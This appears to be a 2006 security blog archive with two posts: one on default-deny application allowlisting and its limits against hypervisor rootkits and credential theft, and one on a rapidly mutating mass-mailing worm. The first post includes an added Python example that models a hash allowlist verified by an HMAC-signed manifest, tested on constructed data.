On the surface, this provides a more realistic defence against most malware. It accepts that malware will make its way into the enterprise one way or another. Denying everything that lacks a certificate effectively takes the legs out from under malware trying to get CPU time to install itself into the operating system.

I am not yet sure whether this defence will defeat Blue Pill-type attacks, but it will definitely shut down most other existing malware attacks. I am also not yet sure of the performance degradation of checking each request for execution in this way.

With those caveats stated, this type of defence is an excellent tool to consider for your enterprise. It avoids the lag between anti-virus and firewall vendors discovering a threat in the wild and issuing an update. Furthermore, it also defends against most undiscovered malware threats, which pass below the enterprise anti-virus and firewall radar screens. Enterprises need to consider deployment of something like Savant Protection as one of their many layered defences.

What won't it prevent? Criminals who obtain a user's ID and password, token and biometrics and fraudulently masquerade as the user.
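The default-deny idea is worth seeing in miniature, because its strength and its limits both follow from one rule: nothing executes unless it is provably on an approved list. The following added example is not Savant Protection's product or any real allowlisting implementation; it models the mechanism with content hashes and an HMAC-signed manifest standing in for the certificate a real product would use, over constructed byte strings rather than real binaries. It shows the four checks a practitioner should make before trusting such a control: an approved image runs, an unknown image is refused without anyone having first identified it as bad, a single-byte modification of an approved image is refused, and a manifest someone has edited to add their own entry is refused because its signature no longer verifies.

```python
"""Default-deny execution policy: an image runs only if its hash appears in a
manifest signed by the approval authority. Added example; HMAC stands in for
the certificate/signature a real product would use, and the 'binaries' are
constructed byte strings."""
import hashlib
import hmac
import json

def fingerprint(image: bytes) -> str:
    """Content hash of the executable image; the policy is keyed on this."""
    return hashlib.sha256(image).hexdigest()

def _canonical(approved: dict) -> bytes:
    return json.dumps(approved, sort_keys=True, separators=(",", ":")).encode()

def sign_manifest(approved: dict, authority_key: bytes) -> dict:
    """Approval authority issues {name: sha256} plus a MAC over it."""
    tag = hmac.new(authority_key, _canonical(approved), hashlib.sha256).hexdigest()
    return {"approved": approved, "tag": tag}

def manifest_is_authentic(manifest: dict, authority_key: bytes) -> bool:
    expected = hmac.new(authority_key, _canonical(manifest["approved"]),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, manifest["tag"])

def may_execute(image: bytes, manifest: dict, authority_key: bytes) -> tuple:
    """(allowed, reason). Never asks 'is this known bad?', only 'is this
    provably approved?'. An unverifiable manifest means deny everything."""
    if not manifest_is_authentic(manifest, authority_key):
        return False, "manifest signature invalid: deny everything"
    digest = fingerprint(image)
    for name, approved_digest in manifest["approved"].items():
        if hmac.compare_digest(digest, approved_digest):
            return True, f"approved as {name}"
    return False, f"not on allowlist (sha256 {digest[:12]}...)"

# Constructed stand-ins for real binaries and for the authority's key.
AUTHORITY_KEY = b"example-approval-authority-key"
PAYROLL_APP = b"\x7fELF...payroll-app-v3.2 (constructed bytes)"
MAIL_CLIENT = b"\x7fELF...mail-client-v9 (constructed bytes)"
MANIFEST = sign_manifest(
    {"payroll-app": fingerprint(PAYROLL_APP), "mail-client": fingerprint(MAIL_CLIENT)},
    AUTHORITY_KEY,
)

def demo() -> dict:
    """The four cases to check before trusting an allowlisting control."""
    dropped_trojan = b"MZ...dropped-by-office-macro (constructed bytes)"
    patched_payroll = PAYROLL_APP + b"\x90"            # one byte appended
    forged = dict(MANIFEST)                            # attacker edits the list...
    forged["approved"] = dict(MANIFEST["approved"], trojan=fingerprint(dropped_trojan))
    return {                                           # ...but cannot re-sign it
        "approved binary": may_execute(PAYROLL_APP, MANIFEST, AUTHORITY_KEY)[0],
        "unknown binary": may_execute(dropped_trojan, MANIFEST, AUTHORITY_KEY)[0],
        "modified approved binary": may_execute(patched_payroll, MANIFEST, AUTHORITY_KEY)[0],
        "forged manifest entry": may_execute(dropped_trojan, forged, AUTHORITY_KEY)[0],
    }

if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:28s} -> {'run' if allowed else 'DENIED'}")
```

Two limits follow directly from the mechanism and match the caveats in the post. An approved program that is itself exploitable, such as the PowerPoint flaw discussed earlier in this archive, still runs, so the attacker's code executes inside a whitelisted process. And a control enforced inside the operating system cannot see anything that sits beneath it, which is where a Blue Pill-style hypervisor lives.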

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

October 31, 2006

Malware keeps getting smarter

Malware continues to evolve. In this news story released yesterday, a new form of mass-mailing worm infects a computer, steals its email contact list, emails itself to everyone on the list, and then the newly infected computers update their code every 30 minutes from a variety of other computers. At least 150 different variants have now been identified.

This story indicates several things:
1. We can no longer maintain lists of "bad things" and let all the "good things" through the firewall. The rate of change of the malware is now way too fast for this to be reliable. Furthermore, someone has to discover a "bad thing" before it makes the list. What happens if your enterprise gets struck before someone discovers it and then makes a patch and then you install it?

2. The pace of attacks is picking up speed. There are so many computers on the internet that are infected, that there are now bot wars between malware trying to remove other malware. The number of infected computers means that the number of attacks increases. As bots evolve, this means that a new attack pattern can be quickly replicated and soon perhaps millions of computers are now infected and attacking the enterprise firewalls.

3. Enterprises need multiple layers of defence. The perimeter needs layers, and inside the enterprise there also need to be multiple layers of defence. Enterprises need a security architecture that admits that the outer, and even some of the inner, layers will be breached, and prepares to contain the damage.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com